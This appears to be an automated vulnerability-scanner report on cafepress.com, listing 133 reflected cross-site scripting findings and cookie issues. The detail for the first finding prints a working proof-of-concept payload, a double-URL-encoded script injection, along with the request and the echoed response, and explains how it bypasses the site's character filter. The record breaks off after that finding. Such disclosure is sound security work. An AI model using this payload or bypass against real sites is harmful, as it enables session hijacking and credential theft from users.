cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in cafepress.com | Vulnerability Crawler Report

Report generated by XSS.CX at Mon Dec 27 10:38:41 CST 2010.


Contents

1. Cross-site scripting (reflected)


1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]

1.2. http://www.cafepress.com/ [cp-v cookie]

1.3. http://www.cafepress.com/ [cp_st cookie]

1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]

1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]

1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]

1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]

1.8. http://www.cafepress.com/+aprons [cp-v cookie]

1.9. http://www.cafepress.com/+aprons [cp_st cookie]

1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]

1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]

1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]

1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]

1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]

1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]

1.16. http://www.cafepress.com/+bags [cp-v cookie]

1.17. http://www.cafepress.com/+bags [cp_st cookie]

1.18. http://www.cafepress.com/+boxers [cp-v cookie]

1.19. http://www.cafepress.com/+boxers [cp_st cookie]

1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]

1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]

1.22. http://www.cafepress.com/+buttons [cp-v cookie]

1.23. http://www.cafepress.com/+buttons [cp_st cookie]

1.24. http://www.cafepress.com/+calendars [cp-v cookie]

1.25. http://www.cafepress.com/+calendars [cp_st cookie]

1.26. http://www.cafepress.com/+clocks [cp-v cookie]

1.27. http://www.cafepress.com/+clocks [cp_st cookie]

1.28. http://www.cafepress.com/+coasters [cp-v cookie]

1.29. http://www.cafepress.com/+coasters [cp_st cookie]

1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]

1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]

1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]

1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]

1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]

1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]

1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]

1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]

1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]

1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]

1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]

1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]

1.42. http://www.cafepress.com/+journals [cp-v cookie]

1.43. http://www.cafepress.com/+journals [cp_st cookie]

1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]

1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]

1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]

1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]

1.48. http://www.cafepress.com/+magnets [cp-v cookie]

1.49. http://www.cafepress.com/+magnets [cp_st cookie]

1.50. http://www.cafepress.com/+mousepads [cp-v cookie]

1.51. http://www.cafepress.com/+mousepads [cp_st cookie]

1.52. http://www.cafepress.com/+mugs [cp-v cookie]

1.53. http://www.cafepress.com/+mugs [cp_st cookie]

1.54. http://www.cafepress.com/+ornaments [cp-v cookie]

1.55. http://www.cafepress.com/+ornaments [cp_st cookie]

1.56. http://www.cafepress.com/+posters [cp-v cookie]

1.57. http://www.cafepress.com/+posters [cp_st cookie]

1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]

1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]

1.60. http://www.cafepress.com/+steins [cp-v cookie]

1.61. http://www.cafepress.com/+steins [cp_st cookie]

1.62. http://www.cafepress.com/+stocking [cp-v cookie]

1.63. http://www.cafepress.com/+stocking [cp_st cookie]

1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]

1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]

1.66. http://www.cafepress.com/+thermos [cp-v cookie]

1.67. http://www.cafepress.com/+thermos [cp_st cookie]

1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]

1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]

1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]

1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]

1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]

1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]

1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]

1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]

1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]

1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]

1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]

1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]

1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]

1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]

1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]

1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]

1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]

1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]

1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]

1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]

1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]

1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]

1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]

1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]

1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]

1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]

1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]

1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]

1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]

1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]

1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]

1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]

1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]

1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]

1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]

1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]

1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]

1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]

1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]

1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]

1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]

1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]

1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]

1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]

1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]

1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]

1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]

1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]

1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]

1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]

1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]

1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]

1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]

1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]

1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]

1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]

1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]

1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]

1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]

1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]

1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]

1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]

1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]

1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]

1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]

1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]

2. Cookie scoped to parent domain

2.1. http://www.cafepress.com/

2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

2.5. http://www.cafepress.com/+aprons

2.6. http://www.cafepress.com/+baby-blanket

2.7. http://www.cafepress.com/+baby-bodysuits

2.8. http://www.cafepress.com/+baby-hat

2.9. http://www.cafepress.com/+bags

2.10. http://www.cafepress.com/+boxers

2.11. http://www.cafepress.com/+bumper-stickers

2.12. http://www.cafepress.com/+buttons

2.13. http://www.cafepress.com/+calendars

2.14. http://www.cafepress.com/+clocks

2.15. http://www.cafepress.com/+coasters

2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536

2.17. http://www.cafepress.com/+framed-prints

2.18. http://www.cafepress.com/+greeting_cards

2.19. http://www.cafepress.com/+hats-caps

2.20. http://www.cafepress.com/+ipad-cases

2.21. http://www.cafepress.com/+iphone-cases

2.22. http://www.cafepress.com/+journals

2.23. http://www.cafepress.com/+keepsake_boxes

2.24. http://www.cafepress.com/+license_plate_frames

2.25. http://www.cafepress.com/+magnets

2.26. http://www.cafepress.com/+mousepads

2.27. http://www.cafepress.com/+mugs

2.28. http://www.cafepress.com/+ornaments

2.29. http://www.cafepress.com/+posters

2.30. http://www.cafepress.com/+stadium-blanket

2.31. http://www.cafepress.com/+steins

2.32. http://www.cafepress.com/+stocking

2.33. http://www.cafepress.com/+sweatshirts-hoodies

2.34. http://www.cafepress.com/+thermos

2.35. http://www.cafepress.com/+underwear-panties

2.36. http://www.cafepress.com/+water-bottles

2.37. http://www.cafepress.com/+womens-tank-tops

2.38. http://www.cafepress.com/+womens-thongs

2.39. http://www.cafepress.com/+yoga-mats

2.40. http://www.cafepress.com/TheGamingApe

2.41. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx

2.42. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx

2.43. http://www.cafepress.com/cp/info/about/

2.44. http://www.cafepress.com/cp/info/help/

2.45. http://www.cafepress.com/cp/info/help/index.aspx

2.46. http://www.cafepress.com/cp/info/sell/index.aspx

2.47. http://www.cafepress.com/cp/moredetails.aspx

2.48. http://www.cafepress.com/cp/products/

2.49. http://www.cafepress.com/cp/sitemap/

2.50. http://www.cafepress.com/cp/tags/

2.51. http://www.cafepress.com/cp/viewcart.aspx

2.52. http://www.cafepress.com/make/birth-announcements

2.53. http://www.cafepress.com/make/custom-baby-gear

2.54. http://www.cafepress.com/make/custom-buttons

2.55. http://www.cafepress.com/make/custom-hats

2.56. http://www.cafepress.com/make/custom-hoodies-sweatshirts

2.57. http://www.cafepress.com/make/custom-ipad-case

2.58. http://www.cafepress.com/make/custom-iphone-cases

2.59. http://www.cafepress.com/make/custom-mugs

2.60. http://www.cafepress.com/make/custom-stickers

2.61. http://www.cafepress.com/make/custom-stockings

2.62. http://www.cafepress.com/make/custom-t-shirts

2.63. http://www.cafepress.com/make/custom-thermos

2.64. http://www.cafepress.com/make/custom-water-bottles

2.65. http://www.cafepress.com/make/holiday-invitations

2.66. http://www.cafepress.com/make/holiday-photo-cards

2.67. http://www.cafepress.com/make/makeacard.aspx

2.68. http://www.cafepress.com/make/personalized-gifts

2.69. http://www.cafepress.com/make/personalized-ornaments

2.70. http://www.cafepress.com/sk/TheGamingApe

3. Cookie without HttpOnly flag set

3.1. http://www.cafepress.com/

3.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

3.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

3.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

3.5. http://www.cafepress.com/+aprons

3.6. http://www.cafepress.com/+baby-blanket

3.7. http://www.cafepress.com/+baby-bodysuits

3.8. http://www.cafepress.com/+baby-hat

3.9. http://www.cafepress.com/+bags

3.10. http://www.cafepress.com/+boxers

3.11. http://www.cafepress.com/+bumper-stickers

3.12. http://www.cafepress.com/+buttons

3.13. http://www.cafepress.com/+calendars

3.14. http://www.cafepress.com/+clocks

3.15. http://www.cafepress.com/+coasters

3.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536

3.17. http://www.cafepress.com/+framed-prints

3.18. http://www.cafepress.com/+greeting_cards

3.19. http://www.cafepress.com/+hats-caps

3.20. http://www.cafepress.com/+ipad-cases

3.21. http://www.cafepress.com/+iphone-cases

3.22. http://www.cafepress.com/+journals

3.23. http://www.cafepress.com/+keepsake_boxes

3.24. http://www.cafepress.com/+license_plate_frames

3.25. http://www.cafepress.com/+magnets

3.26. http://www.cafepress.com/+mousepads

3.27. http://www.cafepress.com/+mugs

3.28. http://www.cafepress.com/+ornaments

3.29. http://www.cafepress.com/+posters

3.30. http://www.cafepress.com/+stadium-blanket

3.31. http://www.cafepress.com/+steins

3.32. http://www.cafepress.com/+stocking

3.33. http://www.cafepress.com/+sweatshirts-hoodies

3.34. http://www.cafepress.com/+thermos

3.35. http://www.cafepress.com/+underwear-panties

3.36. http://www.cafepress.com/+water-bottles

3.37. http://www.cafepress.com/+womens-tank-tops

3.38. http://www.cafepress.com/+womens-thongs

3.39. http://www.cafepress.com/+yoga-mats

3.40. http://www.cafepress.com/1/1/index1.html

3.41. http://www.cafepress.com/1/1/indexd1.html

3.42. http://www.cafepress.com/1/3/index1.html

3.43. http://www.cafepress.com/1/3/indexb1.html

3.44. http://www.cafepress.com/1/3/indexc1.html

3.45. http://www.cafepress.com/TheGamingApe

3.46. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx

3.47. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx

3.48. http://www.cafepress.com/cp/info/about/

3.49. http://www.cafepress.com/cp/info/help/

3.50. http://www.cafepress.com/cp/info/help/index.aspx

3.51. http://www.cafepress.com/cp/info/sell/index.aspx

3.52. http://www.cafepress.com/cp/moredetails.aspx

3.53. http://www.cafepress.com/cp/products/

3.54. http://www.cafepress.com/cp/sitemap/

3.55. http://www.cafepress.com/cp/tags/

3.56. http://www.cafepress.com/cp/viewcart.aspx

3.57. http://www.cafepress.com/make/birth-announcements

3.58. http://www.cafepress.com/make/custom-baby-gear

3.59. http://www.cafepress.com/make/custom-buttons

3.60. http://www.cafepress.com/make/custom-hats

3.61. http://www.cafepress.com/make/custom-hoodies-sweatshirts

3.62. http://www.cafepress.com/make/custom-ipad-case

3.63. http://www.cafepress.com/make/custom-iphone-cases

3.64. http://www.cafepress.com/make/custom-mugs

3.65. http://www.cafepress.com/make/custom-stickers

3.66. http://www.cafepress.com/make/custom-stockings

3.67. http://www.cafepress.com/make/custom-t-shirts

3.68. http://www.cafepress.com/make/custom-thermos

3.69. http://www.cafepress.com/make/custom-water-bottles

3.70. http://www.cafepress.com/make/holiday-invitations

3.71. http://www.cafepress.com/make/holiday-photo-cards

3.72. http://www.cafepress.com/make/makeacard.aspx

3.73. http://www.cafepress.com/make/personalized-gifts

3.74. http://www.cafepress.com/make/personalized-ornaments

3.75. http://www.cafepress.com/sk/TheGamingApe

3.76. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

4. Cross-domain Referer leakage

4.1. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

4.2. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

4.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

4.4. http://www.cafepress.com/cp/info/help/index.aspx

4.5. http://www.cafepress.com/cp/info/sell/index.aspx

4.6. http://www.cafepress.com/cp/moredetails.aspx

4.7. http://www.cafepress.com/cp/viewcart.aspx

5. Cross-domain script include

5.1. http://www.cafepress.com/

5.2. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

5.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

5.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

5.5. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

5.6. http://www.cafepress.com/+aprons

5.7. http://www.cafepress.com/+baby-blanket

5.8. http://www.cafepress.com/+baby-bodysuits

5.9. http://www.cafepress.com/+baby-hat

5.10. http://www.cafepress.com/+bags

5.11. http://www.cafepress.com/+boxers

5.12. http://www.cafepress.com/+bumper-stickers

5.13. http://www.cafepress.com/+buttons

5.14. http://www.cafepress.com/+calendars

5.15. http://www.cafepress.com/+clocks

5.16. http://www.cafepress.com/+coasters

5.17. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536

5.18. http://www.cafepress.com/+framed-prints

5.19. http://www.cafepress.com/+greeting_cards

5.20. http://www.cafepress.com/+hats-caps

5.21. http://www.cafepress.com/+ipad-cases

5.22. http://www.cafepress.com/+iphone-cases

5.23. http://www.cafepress.com/+journals

5.24. http://www.cafepress.com/+keepsake_boxes

5.25. http://www.cafepress.com/+license_plate_frames

5.26. http://www.cafepress.com/+magnets

5.27. http://www.cafepress.com/+mousepads

5.28. http://www.cafepress.com/+mugs

5.29. http://www.cafepress.com/+ornaments

5.30. http://www.cafepress.com/+posters

5.31. http://www.cafepress.com/+stadium-blanket

5.32. http://www.cafepress.com/+steins

5.33. http://www.cafepress.com/+stocking

5.34. http://www.cafepress.com/+sweatshirts-hoodies

5.35. http://www.cafepress.com/+thermos

5.36. http://www.cafepress.com/+underwear-panties

5.37. http://www.cafepress.com/+water-bottles

5.38. http://www.cafepress.com/+womens-tank-tops

5.39. http://www.cafepress.com/+womens-thongs

5.40. http://www.cafepress.com/+yoga-mats

5.41. http://www.cafepress.com/1/1/index1.html

5.42. http://www.cafepress.com/1/1/indexd1.html

5.43. http://www.cafepress.com/1/3/index1.html

5.44. http://www.cafepress.com/1/3/indexb1.html

5.45. http://www.cafepress.com/1/3/indexc1.html

5.46. http://www.cafepress.com/cp/info/about/

5.47. http://www.cafepress.com/cp/info/help/index.aspx

5.48. http://www.cafepress.com/cp/info/sell/index.aspx

5.49. http://www.cafepress.com/cp/moredetails.aspx

5.50. http://www.cafepress.com/cp/sitemap/

5.51. http://www.cafepress.com/cp/viewcart.aspx

5.52. http://www.cafepress.com/cp/viewcart.aspx

5.53. http://www.cafepress.com/make/birth-announcements

5.54. http://www.cafepress.com/make/custom-baby-gear

5.55. http://www.cafepress.com/make/custom-buttons

5.56. http://www.cafepress.com/make/custom-hats

5.57. http://www.cafepress.com/make/custom-hoodies-sweatshirts

5.58. http://www.cafepress.com/make/custom-ipad-case

5.59. http://www.cafepress.com/make/custom-iphone-cases

5.60. http://www.cafepress.com/make/custom-mugs

5.61. http://www.cafepress.com/make/custom-stickers

5.62. http://www.cafepress.com/make/custom-stockings

5.63. http://www.cafepress.com/make/custom-t-shirts

5.64. http://www.cafepress.com/make/custom-thermos

5.65. http://www.cafepress.com/make/custom-water-bottles

5.66. http://www.cafepress.com/make/holiday-invitations

5.67. http://www.cafepress.com/make/holiday-photo-cards

5.68. http://www.cafepress.com/make/personalized-gifts

5.69. http://www.cafepress.com/make/personalized-ornaments

5.70. http://www.cafepress.com/sk/TheGamingApe

6. Email addresses disclosed

6.1. http://www.cafepress.com/TheGamingApe

6.2. http://www.cafepress.com/make/custom-baby-gear

6.3. http://www.cafepress.com/make/custom-buttons

6.4. http://www.cafepress.com/make/custom-ipad-case

6.5. http://www.cafepress.com/make/custom-iphone-cases

6.6. http://www.cafepress.com/make/custom-stickers

6.7. http://www.cafepress.com/make/custom-stockings

6.8. http://www.cafepress.com/make/custom-thermos

6.9. http://www.cafepress.com/make/custom-water-bottles

6.10. http://www.cafepress.com/make/personalized-gifts

6.11. http://www.cafepress.com/make/personalized-ornaments

7. HTML does not specify charset

8. Content type incorrectly stated



1. Cross-site scripting (reflected)
There are 133 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain; input that fails validation should be rejected, not sanitised. Second, user input should be encoded for the context into which it is copied at any point where it is echoed into application responses: in an HTML context, all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; and so on); in a JavaScript string context, which is where every instance below is echoed, HTML encoding is not sufficient and the value must additionally be escaped as a JavaScript string literal. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 was submitted in the REST URL parameter 1. This input was echoed as 2ebb4</script><script>alert(1)</script>df6f6b5b741 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,2990075362ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
ntCoent-Length: 43454
Date: Sun, 26 Dec 2010 13:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:47:13 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:47:13 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 43454


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
afepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,2990075362ebb4</script><script>alert(1)</script>df6f6b5b741'
window.cafepress.tealeaf.searchTerm = ''
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
